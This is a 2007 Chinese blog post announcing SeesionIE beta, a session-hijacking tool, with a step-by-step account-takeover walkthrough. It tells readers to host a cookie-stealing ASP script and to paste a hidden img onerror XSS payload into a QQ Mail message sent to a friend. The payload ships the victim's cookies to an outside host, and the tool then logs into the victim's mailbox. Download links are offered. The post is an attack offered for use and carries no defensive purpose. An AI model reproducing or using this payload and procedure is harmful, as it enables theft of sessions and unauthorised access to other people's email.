SeesionIE beta

2007/10/17 7:08 | 鬼仔 | 工具收集 | 占个座先

作者:cnqing
来源:中国互联网信息安全团队

SeesionIE v1021 beta
说明:
利用COOKIE信息来伪造会话的工具,内置winpcap.类似“黑帽”聚会中的hamster
v1.0.2.1更新:
1.去除了DEV皮肤控件
2.修正了多次覆盖COOKIE的Bug

整个过程分两步
A.xss取cookie
B.利用cookie伪造session

==========================================================================
Example:

A:
  1.将下载的hkcxss.asp放到支持ASP的服务器,这里是http://www.cncert.net/xss/c.asp。
  这是盗cookie脚本,结果存为同目录的cookies.xml

B:在SeeionIE中

  1.先选好网卡、勾上攻击模式。
  2.UPURL 中填好:http://www.cncert.net/xss/cookies.xml,勾上自动更新。
  3.使用QQ邮箱,HTML源文件格式,贴入如下代码,然后发送给另外一个好友。

<div style="display:none">
<img src="#"/**/onerror=java:document.images[0].src="http://www.cncert.net/xss/c.asp?"+parent.document.cookie>
</div>XSStest

  4.当对方打开这封邮件的时候,SeeionIE就会自动进入对方邮箱

下载地址(下载后请将后缀改为rar):
含.net版本下载
不含.net版本下载

Tags:

相关日志

发表评论